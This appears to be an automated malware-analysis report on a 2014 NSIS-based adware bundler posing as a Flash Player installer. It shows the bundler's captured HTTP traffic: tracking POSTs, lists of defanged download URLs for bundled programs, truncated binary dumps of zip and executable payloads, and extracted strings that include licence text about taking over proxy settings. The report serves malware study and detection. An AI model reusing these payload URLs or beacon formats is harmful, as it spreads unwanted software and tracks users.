from=wrapper&type=wrapper&pubid=12872&CbId=9342&mgu=rQXmyP8qC9u3BiBIkZpmYbQ5qfySo1gEw8LbZb2D3XAwsHEqmZsEVA==&subid=&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc&wlc=1
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:49 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.3.28
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
POST /DSS_IMapplication_mon_NV1_2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 336
Connection: Keep-Alive
Cache-Control: no-cache
from=wrapper&type=wrapper&vid=3&pubid=12872&CbId=9342&mgu=rQXmyP8qC9u3BiBIkZpmYbQ5qfySo1gEw8LbZb2D3XAwsHEqmZsEVA==&subid=&lid=EN&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc&advDetails=38~YES~0/145~YES~0/176~YES~0/226~YES~0/234~YES~0/235~YES~0/270~YES~0/239~YES~0/243~YES~0/251~YES~0/260~YES~0/275~YES~0/277~YES~0/283~YES~0/291~YES~0/301~NO~4//
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.3.28
Content-Length: 927
Connection: close
Content-Type: text/html; charset=UTF-8
243~hXXp://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~hXXps://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~hXXp://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~hXXp://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~hXXp://wajam-download.com/download/wajam_download_v2.exe~hXXp://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~hXXp://VVV.reghelper.com/rh/RegistryHelperSetupIM.exe~hXXp://VVV.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~hXXp://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0..
GET /install/valid?v=1&unique_id=0630F6DB1811B361E367028BD09FCCEB HTTP/1.1
Host: VVV.wajam.com
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=shf3uases3advt3l3998fno5n0; path=/; domain=.wajam.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _wau=14071530396341834; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _wal=1407153039; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: not_logged_unique_id=0630F6DB1811B361E367028BD09FCCEB; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _waab=48,31,99,55,52,48,40,63,72,2; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: not_logged_unique_id=0630F6DB1811B361E367028BD09FCCEB; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _wal=1407153039; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: not_logged_unique_id=0630F6DB1811B361E367028BD09FCCEB; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _wal=1407153039; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: APPSESSID=w18|U99zk|U99zk; path=/; domain=.wajam.com
0..
GET /nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secure.goeastcdncache.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2014.p9-jfk ( h0-s2028.p9-jfk), ht-d h0-s2028.p9-jfk.cdngp.net
ETag: "2c31b1-4f28-4fc460c2c9040"
Cache-Control: max-age=604800
Expires: Tue, 05 Aug 2014 12:55:07 GMT
Age: 514532
Content-Length: 20264
Content-Type: application/zip
Last-Modified: Fri, 20 Jun 2014 15:21:29 GMT
Connection: keep-alive
PK...........Bh=.r5...2 ......but1.png}yeP................2........!.........\.,!.38$...s.=.{.......k...w...1Z.JxO)....<...:.f.?=....XH...3Qx).zA...|.<...[7k(....=T.je..>.......u.....Dm.\y.........5q)_...3....j...`<..e.w..`4.P.U..A.._.{@!...6..6"..R........B...}]]`....... .g....H./.......2T...s......r......................@@^!n>^Q.!Q^>..4.?.y..... .g.?......\..........y...DDD.. .............y2..A..i....rt...e[Y.y{I02.}.W....<.S.?...Z..|<....TW......E{z.@..o........z.y{...8;...pQ9...........U.rp.r.tp...A.x....a.n>......*.<..`6Pey..?..GG[Q.........<H..O.$........).........w..v..........?r.....P..WP[E.7W...Y...s...\.....\.........]...?..k._..1. |(...=..:G.L....U....]:2...*.=N.M..f.Z...9...>k....}/_......>ag..[.W.....g..Pv..g/.u........9...r....z.~<...N]=.N..D].a..... ..O.=.z....Ni...$..'-n\....nD...f.../.......T.W.-.%{i....Cn..B\3Nws......:.h.j.J.L.A.\Y..~.7U..........=).... ....|.I...V.........'v....7X.M....U*RWw.4...0..75.k$y.g...Oi...A.?IL.Pp1.p_...V......._....g7.....%..!"..W.!..lK~.\..pQ..P=.GQ..C...5.T..C....`=b|..>b...O...V..B."j.?PCL..r.Y?..>=.SG.v.......U.q...aX..W..[..E.....= ...ws........@...8oz.I.....j.. /."@...h... ...p.jZ....Wyq...t..B..@r..%..6..w........VIus..d...LxE}..-.2B..A.@o...V.......]...0.^?......\....m..Q:G..s...L......&@.P.'...6.. .W..,.!y.F.V.o....U.8..Y.........~..N|..Cq..{J..Q%..%..(.c.]n.H.Ik.A.i.@C#.}"...I.....o.j.n...G......0.W...N......U.o..q..s$.h.zz-gdl......p.........5_.X.....6...)v......U*..}...Wk....%GL....EV..rV...O....m.....w'.
<<< skipped >>>
GET /BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secure.goeastcdncache.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2014.p9-jfk ( h0-s2012.p9-jfk), ht-d h0-s2012.p9-jfk.cdngp.net
ETag: "4a278a-b46-4fc460c25d05d"
Cache-Control: max-age=604800
Expires: Sat, 09 Aug 2014 01:58:28 GMT
Age: 208331
Content-Length: 2886
Content-Type: image/jpeg
Last-Modified: Fri, 20 Jun 2014 15:21:28 GMT
Connection: keep-alive
....\.kwh.LV.......LI....n...E.8...........,....Ll............\..Q.{...f..=X\........8R[...)@...(...Rj...M ....qH....i.c}ri..1f.....9..?.egQ."...R...E6..&...#c...I..L...N... ...%B.O)3Xb:gN.....J....R.6..........Yh._D...8....I.<.)..4.....h....n.h..L.s.2$g......<g.`..ST.(sJ.T.......pZR.. .......}...........m"e*#..H<Z...|.o|LY.d..9.z.O..Y.}..o..."n.M.5...v...a......BR..N.H.$..D.......v..O...0.....t..g..<Q.!..{.D9M.8....&J..ZgU..wUa2..[.....d.YJ^x.V.J.........i.Dz.L.?...%...........I@.\{R$..<..._|.g|LX.f..9.z.O....}........E3..M...E. .A..<d..k...q.)*g..Gk.....s....-.i../...........u.R.......Exif..II*.................Ducky.......<.....)hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:01C2A6FFF88911E3996AB6FAF4E4B048" xmpMM:DocumentID="xmp.did:01C2A700F88911E3996AB6FAF4E4B048"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:01C2A6FDF88911E3996AB6FAF4E4B048" stRef:documentID="xmp.did:01C2A6FEF88911E3996AB6FAF4E4B048"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....
<<< skipped >>>
GET /os/OfferScreen_243_FP_spws243.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2026.p9-jfk), ht-d h0-s2026.p9-jfk.cdngp.net
ETag: "2809b9-7b3c-4fa11b41c8a80"
Cache-Control: max-age=604800
Expires: Wed, 06 Aug 2014 20:34:43 GMT
Age: 400557
Content-Length: 31548
Content-Type: application/zip
Last-Modified: Fri, 23 May 2014 14:04:10 GMT
Connection: keep-alive
PK........ ..D.K.......7......OfferScreen_243.html.[.n.9..=.....:.{\..e[..A.$3Y$.l..... ..(...bu...1z......}.~.=....$;.X,..-.H..w.dU..y......o.L.........0.o....i....a?.............u,S..Zo...7.:..Z..2X...O[w..VH....G_WV...........'...B.3...r3Y....Bs..}.."~..nd.E...u&<..o... ...#..x...\......V2.o.fb.n.<.:.'UZk.........~.....L.:.W.S.y.............E...,.....-...eod...q.mk.o,.5{dc..Os.H...wm|....{......8....GQ.N.f,.-...I._#6..t..g...\y..X...A;[.......#..;pQ.$....~F,..=.#.-3$@.3...D....60.......<a. ......<..1..H...C~..@.W".'# ...%.T..)s....#...#n.....8.#Vr..R....EQ.....q.3.q".{ .X&......}..3.k....Y.-E..Q.@-......>......[....\..`.@..".W......a..Z.|.h8M...pZ.[..2............O..H.......13O.i:..."..e.....9i....<G..._..!.0..x.$B....G,.~.2.5...3.KH...I. .X..L #....Vp....Bh..8..k..b...}.M:....6tw.K..~.Pm...,... ..`..y.....|.y.{8....f.N..>.\%"i..L..........9....s02y"%.*.>....9kg G...j...X$..).f.x.............D.......9.gr.Gdo....A.ade<..... .r..Z.....A1....8.D:..8......Xj-...l...H.>.)h.......x...c..m.O..i2.x..R.X...D....7..&.8....4T.K/.Pl..>.h$b.oJH.P ;....PTD.....O..&..e........\.-...2..\.2..|..b...]6..Z..D...2.~....L..?..........1.u...|.v.T.6...L....r.\.L..c...Z..a7.c.......j...S.Re....[c...3....s......_..".ad.....f2..:..f2.].=.u._..JH.4.d<.A.U.k.1..B...7J..d..._`V.t...qK..*K.]......k......k.>.4. .k....M.1?...ky...n..F.l...v...;..;..............~..R&.Y.X=......>..$./b...r....vVfX.j.>...?..0.m..T.j%.....O.....|V...o..l`.D.H%..u.....c...9G..&..cw.@.5Z.j..Y.^..h...P......f....?..8
<<< skipped >>>
GET /os/js/OfferScreen_291_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2077.p9-jfk), ht-d h0-s2077.p9-jfk.cdngp.net
ETag: "2805b3-4476-4fe4f7d9aa180"
Cache-Control: max-age=604800
Expires: Sun, 10 Aug 2014 22:07:25 GMT
Age: 49395
Content-Length: 17526
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:27:50 GMT
Connection: keep-alive
PK...........DI..l*...........trusted1.jpg.T_o.V............R...i...66(...hy.V...W.7.J." ..M...}.{.......U?@...).U.}....{...HW:.s...........[c......A.,d.....{t.(P$x...i|.....a"8..G...q.D".$.l........GO......9..^....J.h.../.b....=....<....... .P.p..8L.q....D..E..\...oL/.o.......... ..S..lJZS...%(.P..v.Jz..K...O.....k..\.u.YS..H.)....P.4Q.EYn..Fr.....&...&J...R....;..$..|.B...Y...V...w............(.'..........sY5...O>.slb.$@a.cvyr#x..kv[Q-..Q..%Ch...... }.1.<.u..b...I..2!..M5..f4e.J..n...0I..E9..s;..\}.#'.......<<.)N.q......=.C......U.b.;..1...}u..........r....."...n).NSj.3.w]....G.")F.2,..L.T....n.<($........f..........t...@i........&...A.X,...R..I...J.\Y.U...j..e..n.fn....w....666.m..ZZZZ...3...5v...e.....l..CVh.....Yj..|.(.\.j...........Ze..1.....U.....nA.....OP.)R....oO....T.....3P...L..j.P..z...JQ...z[..>.z.>E..=W.y.gs..._..;....9.Y.....PK.........a.Bh=.r4...2 ......but1.png}YuT.]..R.V.;........kh..$.S...F.........fhPi.......u.z.Y......9....~1Z.JxO)....<...:.f.?=....XH...3Qx).zA...|.<...[7k(....=T.je..>.......u.....Dm.\y.........5q)_...3....j...`<..e.w..`4.P.U..A.._.{@!...6..6"..R.......\.^V....0OQ_......Y...2.....,...I..k...y@..xx.mx.....y..yE.E^..x.x.| ..7.....(/.......<l.Du...}........\..........y...DDD.. .............y2.. ....p.{9.....[Y.y{I02.}.W..da.......}..@>.^.......PW...=.t.v.?.S.....@=..=l.<..._d........C.....*j9.y.y:.... .<|...0[7......E.a.^V0..............HD^AV@HV.$..........dx..D.eE.......x.Ba^.sm.. .......l... ..... .........mp..}f.u....00....E
<<< skipped >>>
GET /os/js/OfferScreen_38_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2104.p9-jfk), ht h0-s2104.p9-jfk.cdngp.net
ETag: "2805fe-4546-4fe4f4fa61ac0"
Cache-Control: max-age=604800
Expires: Fri, 08 Aug 2014 22:45:56 GMT
Age: 219884
Content-Length: 17734
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:14:59 GMT
Connection: keep-alive
PK...........D...`.....N......OfferScreen_38.html.[ys.8..{R...0...#......]'vO..9&V.;.5......"8.hY..........{....v.]{.n..m[$...........7......,.......7,.{..v..z..s.....Wl...q.S-.T)Oz..w....d.^o.\v..]..z...;.5......fvc...O....w.$.'-t.GGGv..,x.?..p..C..B...oTjDj..*........;...#..y..9).4<.X.$..x.!......O.....X.7j.q#'..z.......$X..Td........Q8 ..4.8.L..I..?.*."../..q...Q.....w...5;WQ..F.w..O&*^.{6...,WE.......#...'.....g2......LgC.. .....>..................3.~......7HA.....x.U"c.<...K......Q....3v..D....>,6...S./x..@.7..Jg..I.. .[ad.;L..B-r9.....UK.*.H..#4`..H..q3..D..T.X.j.? ......K.%|5.)..'..n.g...l..k,..e.....GF.....H,...LV..o..G1..H#.....F*/.).o.f....J...dw.P....7.s.#.=....02Q...V..FV.<..t...D>bK...p0.[g...y..l0^....-7..H.a._..6KU..Lp.r\.Y..lJ.......k...Rod...<]_..B....E_NAG......t28B.8.B..v.#..)..._...!h)...e.3.e...-.~.....$...t:r....j^G......y.v.........w./F6...B../ZQ..............(.~...fX8..?."t..:d.s.%..n.....3|..|.-r.........FU~...Q....s..".9..^..!.i}0'jb.....%..k...]....C....cI..C.=).Q../....z~...|b.s.a.._.u-...nd.|.q<&..CS....o.3j.Y.=.1...ga.Yg2...O...I...i...- ..(e..D...........l.....*r.............|4.*`.X..Y&..k.L.2..........A..&.k......z....\`..../.......}...h....[.......=". <.I"....Et3Qw...: .I.D$>Ah.. k..e"..W...d.........6<..x.0-z.....L$b..`..0D...S7j..Rm.sS...........&6..\...,....} ..LeE.y... .....Z.'..~.9.s....".aM.t..{.u......~u..6.;..6.w.v;.5..%|..Hv(I.,L6@;b.......>..(....Y.....9?.Gm...# k...Q.z-3.}....l..W.0.b...]...}.4.........\.../.:.y)J...@..g............
<<< skipped >>>
GET /os/js/OfferScreen_235_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2117.p9-jfk), ht h0-s2117.p9-jfk.cdngp.net
ETag: "2806b3-46ef-4fe4f609399c0"
Cache-Control: max-age=604800
Expires: Fri, 08 Aug 2014 17:31:06 GMT
Age: 238774
Content-Length: 18159
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:19:43 GMT
Connection: keep-alive
PK...........D,..ZQ...xP......OfferScreen_235.html.[{o.H..{..;.0.l2...#.-;..V&.u..%.l.......5.....5...5...r.I..../..Y....x&...z......7..../..l...}.}.99g........]....?.>].A..f9OU.#....._y.[i...z.......|........7.......:..=.vJ...8Ug;......v.X...'Bs..}..".?..e.E...&.....3O.....C..x..> ..?.X.$.q6.....v....i:[.D..$.:..@...j6...y.....7.^.GG....$.....I.4.cv.9.a.. ..w.=s.V).......t..dP$ (.....\.....<.[..H......3d.<....Jx.......0.......,...E...l%..J..}.=T;.f......~.@T..C.2.E~2..J.Q.^..g.b..'.HD......=.2....~..-..'............(.x.a.E|/t...S....y....(YV.S......:..E s.qs.@3..Q*..b...H......#..|s......2....e...._...0..}H.>..U..y 5...(..........E..6.2l.d~OR....k...........*.){l.g.G1z..I..2.\........<...I.Q'.![G.^....m..A.......<~...k.^....?g..,.~.2.5...3...).w.Q..c.....z.e;X..6.........c.t..w.u.X....&6....=........_."-|.R X.9....d%.A....|aA.........iU.;.Uw.....l.{....N.........d.....a..o....pp.....Q...-.62...co..D...~..X.......9.W2.C28.... .....&G.....^h9,....,o..'.(.E:..9...t...Rk...O..BJ........~.........2......E.=/.S..Ko...V. .....B..K..h.........\...ru...H..B......6..X...~..Nt..Y..KC-=.r.........>j......... .J.El.....h..4....ox]?.....}..E..<.J|.%..5O.z.(L.2.......T..^..L.?.. c&M.q._A.{.......q...d..ZT.>..#G2..T.[ X..n...?5l@Y....].P....9dT..(.. u......0@1.op...s......_.."."....1L.8kW..Xk..n.....o@.*WL..:A{.b.e.D.4.F........Q.B....;......Zrb....-*.`..t-.G.u.U.......k......\o.no.....O.......-.V....~....t.....u.x..w..9...x.f....5.9.._..."t#..j>...".....*........-6...b...Q....a.S..X*.. .#c..
<<< skipped >>>
GET /os/js/OfferScreen_145_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2080.p9-jfk), ht h0-s2080.p9-jfk.cdngp.net
ETag: "280655-544d-4fe4f54f42300"
Cache-Control: max-age=604800
Expires: Wed, 06 Aug 2014 05:02:51 GMT
Age: 456469
Content-Length: 21581
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:16:28 GMT
Connection: keep-alive
PK........Z..D........"N......OfferScreen_145.html.[.r.8......Z.T.].......-YR.m.. .I{... ...S...%k\]5...r.$s..@Q......?...I.88...@..O.ag.p.c.......m..JN....S.v'].....[V...$.a. _.<.V{.. -.....z...O 2.W'......bs............i..e.&W.../...r=Yp......g;./...*ud.D...&.%......O...[.].8..*U3......O.............d!..#..W.4.Z..`..L.J....dJ...9?o\8u.L.*...a.x....Xz...|)>\V. .J.......x...M..(.....Tz.....}..2.....5.m.._.....<..a..D...p..c..l..zV...[...P...........1....=...<"..{"n..a"..co\.i.@.T..D....m..gW.2n...`......x..V."..)Pj.>.....VB../....$".g- ./...C.......4.....:.x~..|......3...h....c.....[-.:..8.!;.$...H.....l.?......X..`c ..H.g....../..7S..I....D<,.W7.#.U....03.\5.";..."...?... K.-..=.h..gE.*n.......88.8....A T.{4?f.tb...X..1M|...pe...z.k.&.R....V...... kY.......DU...1:._.N...y.'.....UC......h....u.#feh..J.E.....x..8.....t..o.P....'o.I.....Y..........X.A..AT...Z.d..5...}#..?...w.v....c4.u..o..........S|!..E...0...@.E..D.,|.4-.,H.n.T.V&]..6.r.....D.2J9.\..Fv.R).l.GO....`...1..9..?....3.h...........v....b.$.../.r.;..a...T...J...Q...f..).r....4.....$.....y.s...B........I.......F.V.O.2.....O.C gF..:...R.?yK........H.D..[.. a..c|.jM..[..z..S....Ix..D.k.]..q*.J.....8.S.......M.\.Q6........UN..t8B.....=...?....*.....[..A0.#..U/F5.f.....^...m.H.F..i...|........M$.4*..x..p...@.`..Q...:.........H..|6..t.R...w.....Ls..Awmwr..]^B..'\.sB..-b\I.CY.bq..........f]W.o...*..,...G....8..._... E.....j.a..A.y..x...Y.. ......w@.?.......m:`.........2..MU....W.1c'f...j/...G....2O3.H3.a.E..f..MFX.=.=K?...\;..,G.t...p..V..F
<<< skipped >>>
POST /DS_wrapper_details_v2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 47
Connection: Keep-Alive
Cache-Control: no-cache
CbId=9342&&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:35 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.3.28
Content-Length: 476
Connection: close
Content-Type: text/html; charset=UTF-8
Flash Player~hXXp://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg~EI~http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe~$BrowserToPop~0~0~~hXXp://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip~install_flashplayer11x32_mssd_aaa_aih.exe~hXXp://downloadupdates.in/MA1/flash_thankyou2.php~3C~1~1~1~~~~~0~0~~OW..
POST /FCL_Co_v4.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fglasspeast.com
Content-Length: 180
Connection: Keep-Alive
Cache-Control: no-cache
from=wrapper&type=wrapper&vid=3&pubid=12872&CbId=9342&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc&mgu=rQXmyP8qC9u3BiBIkZpmYbQ5qfySo1gEw8LbZb2D3XAwsHEqmZsEVA==&BundleVersionID=IM_210714@01
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 344
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php#hXXp://www.stsunsetwest.com/DS_trackstats_mon_v2.php#CA#hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php#hXXp://VVV.stsunsetwest.com/DS_wrapper_details_v2.php#hXXp://VVV.wajam.com/download/wajam_validate.exe#38/145/176/184/226/234/235/270/239/243/251/260/275/277/283/291/301/320/339/..
GET /download/wajam_validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.wajam.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:35 GMT
Server: Apache
Last-Modified: Wed, 14 Aug 2013 20:48:34 GMT
ETag: "44414-2c00-4e3ee7b227727"
Accept-Ranges: bytes
Content-Length: 11264
Connection: close
Content-Type: application/x-msdos-program
X-Pad: avoid browser bug
Set-Cookie: APPSESSID=w5|U99zj|U99zj; path=/; domain=.wajam.com
Cache-control: private
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z~..;...;...;..D'...;../$...;../$...;../$...;..D3M..;...;...;../$...;../$...;..Rich.;..........PE..L...A..R.................0.......`.......p........@.................................................................................................................................................................................................UPX0.....`..............................UPX1.....0...p...&..................@...UPX2.................*..............@..............................................................................................................................................................................................................................................................................................................................................................................................................3.09.UPX!......X,)rA..u..."......&..b....U...E..@...M...U..._B..#Eg......A...........vT2.].?...%"....E.!..M.........?..k..n......}........j!...}w..Y.H.../.J....M..w.{..;s.LB......~.}.A.}..tq...B..@~..{k..@. fi.....w..{..U..P..Q M.L......Q.{<v...>.}..n?.X....*.. M.....R.{.u5P1.n...J..@..w.e......}.@|.>ns..f.Q)....&a.Z.R.7z.1....`..P.=/.k..*.Q.....3..`....Xa...t,aP...u.o..-MM...j@:.R.E.P]s..>.M..d.F..U..;|..E........onY.. ...}7X.3........3..B........I.......L.p......6.#....#...............x.j."B.a...4.X...!fu....'#U....?.....2<...
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1812:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
http://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|<>/":
*?|<>/":
ShowWebInPage
ShowWebInPage
m\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
m\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
html.old
html.old
void collision with other applications and/or components; and (b) operate in a proxy configuration as part of the Software and the Services. Proxy is a server that acts as an intermediary for requests from clients seeking resources from other servers. If you wish to revert back such proxy configuration to its original state, you have to completely uninstall the Software or use the opt out option that will be provided to you by us within some of the Services; (c) once the Software is installed we may, now or in the future, use features or components to counter third party attempts to modify or replace your then-current proxy configuration without notifying you or get your permission to do so; Such third parties may include (without limitation) malicious programs and other harmful code that, in some cases, may compromise your system (collectively or in separate
void collision with other applications and/or components; and (b) operate in a proxy configuration as part of the Software and the Services. Proxy is a server that acts as an intermediary for requests from clients seeking resources from other servers. If you wish to revert back such proxy configuration to its original state, you have to completely uninstall the Software or use the opt out option that will be provided to you by us within some of the Services; (c) once the Software is installed we may, now or in the future, use features or components to counter third party attempts to modify or replace your then-current proxy configuration without notifying you or get your permission to do so; Such third parties may include (without limitation) malicious programs and other harmful code that, in some cases, may compromise your system (collectively or in separate
). You are hereby giving us your permission to use such features automatically without prior notification to you. Such features and components will act to protect your then-current proxy configurations, however we cannot guarantee 100% success and in no case we will be responsible for any Un-permitted Access or changes made to your system preferences or proxy configurations or to any damage that might have been caused to you due to Un-permitted Access; (d) periodically install automated updates to the Software on your computer as set forth in section 8; (e) place a small icon of the Software in your operating system
). You are hereby giving us your permission to use such features automatically without prior notification to you. Such features and components will act to protect your then-current proxy configurations, however we cannot guarantee 100% success and in no case we will be responsible for any Un-permitted Access or changes made to your system preferences or proxy configurations or to any damage that might have been caused to you due to Un-permitted Access; (d) periodically install automated updates to the Software on your computer as set forth in section 8; (e) place a small icon of the Software in your operating system
s icon tray, from which you will be able to launch the Website to switch on and off the operation of the Software, to change or update your preferences and account settings;<br />
s icon tray, from which you will be able to launch the Website to switch on and off the operation of the Software, to change or update your preferences and account settings;<br />
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
dm\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html
dm\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html
OfferScreen_145.html.old
OfferScreen_145.html.old
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp
